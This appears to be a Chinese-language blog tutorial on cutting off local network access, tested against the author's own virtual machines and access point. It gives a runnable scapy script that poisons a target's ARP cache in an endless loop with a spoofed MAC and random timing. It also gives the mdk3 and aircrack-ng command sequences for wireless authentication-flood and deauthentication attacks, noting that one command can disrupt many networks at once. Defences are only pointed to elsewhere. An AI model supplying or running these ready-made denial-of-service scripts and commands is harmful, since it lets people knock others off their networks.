有線網絡屏蔽
ARP官方釋意:地址解析協議,即ARP(Address Resolution Protocol),是根據獲取的一個。發送信息時將包含目標IP地址的ARP請求廣播到局域網絡上的所有主機,并接收返回消息,以此確定目標的物理地址(mac);收到返回消息后將該IP地址和物理地址存入本機ARP緩存中并保留一定時間,下次請求時直接查詢ARP緩存以節約資源。

實驗環境:
linux parrot(攻擊系統)
Linux centos(被攻擊系統)
實驗語言:Python
Arp協議是網絡不可缺少的一部分,由于arp協議存在一些不可修復的漏洞所以駭客也經常利用這個漏洞進行局域網攻擊。攻擊大致分為兩種。(1)純粹的網絡攻擊,迫使受害者無法使用網絡 (2)目的性攻擊,arp欺騙獲取局域網使用者的信息,盜取賬號密碼等敏感信息。
筆者的電腦是接入寢室網絡的,本來想使用真實電腦作為攻擊目標,鑒于室友正在使用,轉移到虛擬機進行實驗。
搭建實驗環境

Linux parrot(攻擊系統)

Linux centos(被攻擊系統)
我們可以看到終端顯示的信息(網關一般是默認的)
攻擊系統IP :192.168.163.146 MAC:00:0c:29:41:75:aa
被攻擊者IP:192.168.163.150 MAC:00:0c:29:0b:09:89
網絡測試依次使用兩臺機器ping百度顯示信息如下


此信息說明可以連接外網,證明目前可以上網
使用攻擊系統掃描本網段的信息,使用到的工具fping

掃描到目標IP使用arp -a命令確認一下信息如下:

確認無誤,我的局域網中網關以2結尾,所以我們展開192.168.163.2和192.
168.163.150之間的攻擊。
使用python的scapy模塊,編寫對應的ARP包進行發送,由于scapy有獨立的交互模式,我們就直接在終端中進行編程。注意這里要進入root權限
核心源代碼如下:
>>> a = ARP()
>>> a.show()
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= None
plen= None
op= who-has
hwsrc= 00:0c:29:41:75:aa
psrc= 192.168.163.146
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0
>>> a.psrc = '192.168.163.2'
>>> a.pdst = '192.168.163.150'
>>> send(a,loop=1)
正在攻擊目標

驗證:

Ping百度沒有反應,網關mac地址也被修改為攻擊機的MAC地址
Python代碼:
from scapy.all import *
import time
import random
pdst=str(input("目標IP:"))
gw=str(input("網關IP:"))
a = ARP()
a.pdst = pdst
a.psrc = gw
a.hwsrc = 'b4:1e:89:20:43:A1'
while 1:
send(a,loop =0)
time.sleep(random.uniform(10,5))
無線網絡屏蔽
無線網絡攻擊相對上面的操作更加簡單,純工具攻擊方案。首先需要一個攻擊系統,我選用parrot security系統,因為這個系統整合的工具比較全,現對于kali來說雖然沒有什么較大的優勢但是他的UI界面做的相當的好。
插入無線網卡

可以看到無線網卡被命名為了wlan0(因為一般都是這樣命名的),使用airmon-ng將無線網專為mon模式,在這之前最好把網卡mac地址改變一下(我也不知道有什么用總之這樣改感覺謹慎一些):
ifconfig wlan0 down
Macchanger -m MAC wlan0
ifconfg wlan0 up


airmon-ng start wlan0

接下來就可以使用wlan0mon進行無線網的查看了,記住名字已經變成wlan0mon了
使用airodump-ng wlan0mon或者wifete

打開就立刻掃到這兩個wifi,實驗目標是ruijie(傳說中的我打我自己,吐槽一下銳捷客戶端,不能開wifi就算了連虛擬機都不能用,讓計算機專業的學生怎么搭建環境,雖然我不是計算機專業)。
直接開始攻擊 mdk3 wlan0mon a -i MAC -s 速率

從連接狀況可以看出來有大量的mac地址請求建立連接,當然我的手機已經沒網了,大概就是0-20秒網絡變的卡頓,之后完全失去網絡通訊,當然這只是一個AP的攻擊想要實現一定范圍的網絡中斷其實也就是一個命令的事。mdk3 wlan0mon d -w 白名單AP的mac -b黑名單AP的mac -c 信道。回車鍵敲下去后果可想而知,網卡可能會壞掉 哈哈…
這兩種攻擊方式有點不一樣,第一個是洪水攻擊利用大量的偽造mac迫使AP無法正常提供服務,第二種是直接進行解除認證。
Aircrack-ng套裝是專門針對無線的一套工具,mdk3是專用的攻擊工具,除了上面的案例還有許多可研究的使用方法。
總結:
兩種比較常見的局域網攻擊手段,單個拿出來看似確實沒什么,但是兩個組合在一起完全可以制造一個網絡屏蔽空間,對目標造成一定的危害,雖然是局域網,但也請不要隨意對他人使用,具體的防御方法在其他的文章中也有講述,ARP攻防那篇文章有講到如何預防ARP攻擊,無線攻擊預防方案只能在路由中進行設置,有些到目前為止都還沒找到合適的防御方案。